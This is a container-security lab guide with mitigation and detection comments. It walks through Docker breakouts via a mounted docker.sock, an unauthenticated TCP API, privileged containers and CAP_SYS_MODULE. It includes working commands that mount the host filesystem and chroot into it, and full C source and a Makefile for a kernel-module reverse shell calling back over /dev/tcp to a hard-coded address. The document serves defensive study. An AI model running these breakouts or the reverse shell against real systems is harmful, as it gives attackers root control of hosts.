Container Security – Common issues

A) Docker Unix socket mounted in the container / Docker TCP socket exposed (Container Breakout 1)

# Risk: a bind-mounted docker.sock (or an unauthenticated TCP API) gives the
# container full control of the daemon, which is equivalent to root on the host.
# Mitigation: never mount the socket into workloads; if the API must be reachable,
# put a filtering socket proxy in front of it or use TLS-authenticated TCP, and
# never bind it on 0.0.0.0. Detection: check HostConfig.Binds of running
# containers for /run/docker.sock and for "/" mounted into a container, and alert
# on dockerd listening on a non-loopback TCP port.
netstat -a -p --unix | grep docker
# Lab setup: this is the misconfiguration under review (daemon socket mounted
# into an otherwise unprivileged container).
docker run -it -v /run/docker.sock:/var/docker.sock --name alpine1 alpine sh
find / -name docker.sock
# Engine API reached directly through the socket; the "> " at the start of the
# next two lines is the interactive shell's continuation prompt captured by the
# paste, not part of the command.
curl --unix-socket /var/docker.sock -H "Content-Type: application/json" \
> -d '{"Image": "alpine", "Cmd": ["echo", "hello world"]}' \
> -X POST http://localhost/v1.41/containers/create
# Two separate commands (.../start and curl .../wait) were fused onto one line
# by the page layout; the id is the one returned by the create call above.
curl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/startcurl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/wait
# A static docker CLI is fetched on the host and served over HTTP; 172.17.0.1 is
# presumably the host's docker0 bridge address as seen from the container.
wget https://download.docker.com/linux/static/stable/x86_64/docker-20.10.9.tgz
tar -xvf docker-20.10.9.tgz
python3 -m http.server 80
curl http://172.17.0.1/docker/docker --output docker_cli
chmod +x docker_cli
# The host root filesystem is mounted into a new container through the socket;
# this is the step that turns any docker.sock mount into a host compromise.
./docker_cli -H unix:///var/docker.sock run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash
# Variant: daemon listening on an unauthenticated TCP port. Any client that can
# reach 2375 gets the same result, so bind the TCP API only with --tlsverify
# (or not at all) and firewall it.
/usr/sbin/dockerd -H tcp://0.0.0.0:2375
docker -H tcp://0.0.0.0:2375 run --net=host -it ubuntu sh
./docker -H tcp://127.0.0.1:2375 run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash

B) Privileged container, or all capabilities allowed (Container Breakout 2)

--privileged OR --cap-add=all
# --privileged (and, for the relevant part, --cap-add=all) removes the default
# capability and device restrictions, so the host's block device can simply be
# mounted from inside the container. Mitigation: never run --privileged in
# production; grant the minimal capability set and keep device cgroup rules
# enforced. Detection: alert on HostConfig.Privileged=true / CapAdd=ALL and on
# mount syscalls originating from container processes.
mount /dev/sda1 /mnt
chroot /mnt bash

C) Exploiting capabilities

# Capability audit: the Cap* lines in /proc/1/status hold the container's
# capability sets as hex masks and capsh decodes them. The mask on this page
# decodes to a set that includes cap_sys_module, which is the issue in this
# section: it permits loading kernel code, which defeats every container
# boundary. Mitigation: never add CAP_SYS_MODULE (or run --privileged); detection:
# audit the init_module/finit_module syscalls and kernel "module loaded" messages.
ps -aux
cat /proc/1/status | grep Cap
capsh --decode=00000000a80525fb
# Kernel headers are only needed to compile the module below (lab setup);
# a production host should not carry a build toolchain.
sudo apt-get install -y build-essential linux-headers-$(uname -r)
hostname -i
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kmod.h>
/*
 * Module metadata. Note that nothing here is enforced: an unsigned, out-of-tree
 * module like this loads on any kernel without CONFIG_MODULE_SIG_FORCE or
 * lockdown, which is why those settings are the primary host-side mitigation.
 */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
/*
 * Hard-coded callback endpoint. The string is handed to call_usermodehelper()
 * below, so the resulting process runs as a kernel-spawned user-mode helper,
 * i.e. with root privileges and outside the container's namespaces. The
 * outbound TCP connection to a fixed address is what egress filtering and
 * module-load auditing would surface.
 */
static char command[] = "bash -i >& /dev/tcp/172.17.0.3/8888 0>&1";

/* argv for the helper: bash runs the string above as a command. */
char *argv[] = {
    "/bin/bash",
    "-c",    // run the next argument as a command string
    command, // the callback command
    NULL     // end of the list
};
/* Minimal environment for the helper. */
static char *envp[] = {
    "HOME=/",
    NULL // end of the list
};

/*
 * Module entry point: runs once at insmod time and immediately spawns the
 * user-mode helper. Because the action happens inside init, the only moment
 * to detect or block it is the module load itself (init_module/finit_module
 * audit rules, signature enforcement, lockdown).
 *
 * Returns the call_usermodehelper() status, which becomes the insmod result.
 */
static int __init connect_back_init(void)
{

    return call_usermodehelper(
        argv[0],      // execution path
        argv,         // arguments for process
        envp,         // environment for process
        UMH_WAIT_EXEC // return once the helper has exec'd; do not wait for it to exit
    );
}

/*
 * Module exit: only logs. Unloading the module does not terminate the helper
 * process it spawned, so rmmod is not a remediation step on its own.
 */
static void __exit connect_back_exit(void)
{
    printk(KERN_INFO "Exiting\n");
}

/* Register the load/unload entry points above with the module loader. */
module_init(connect_back_init);
module_exit(connect_back_exit);
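# Out-of-tree kbuild wrapper. Kbuild itself only reads obj-m; the all/clean
# targets exist for the outer, non-kbuild invocation and delegate to the
# kernel's build system for the selected kernel.
obj-m += reverseshell_module.o

# Kernel build directory. Defaults to the running kernel's headers; override
# with `make KDIR=/path/to/headers` to build against another kernel.
KDIR ?= /lib/modules/$(shell uname -r)/build

# all and clean are commands, not files: declare them phony so a stray file
# with either name cannot make them look up to date.
.PHONY: all clean

# $(MAKE) (not a literal make) propagates -j/-n to the recursive invocation;
# $(CURDIR) replaces $(shell pwd) without forking a shell.
all:
	$(MAKE) -C $(KDIR) M=$(CURDIR) modules

clean:
	$(MAKE) -C $(KDIR) M=$(CURDIR) clean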
# Loading the module requires CAP_SYS_MODULE in the container; the exec bit
# set by chmod +x is irrelevant to insmod. The fetched file name (rev_module.ko)
# differs from the obj-m name in the Makefile above, so the object was
# presumably renamed after the build. Mitigations that hold regardless of the
# container's capabilities: module signature enforcement (CONFIG_MODULE_SIG_FORCE)
# or kernel lockdown, and egress filtering of the callback address. Detection:
# audit init_module/finit_module and watch for new entries in /proc/modules.
wget http://172.17.0.1:8000/rev_module.ko
chmod +x rev_module.ko; insmod rev_module.ko
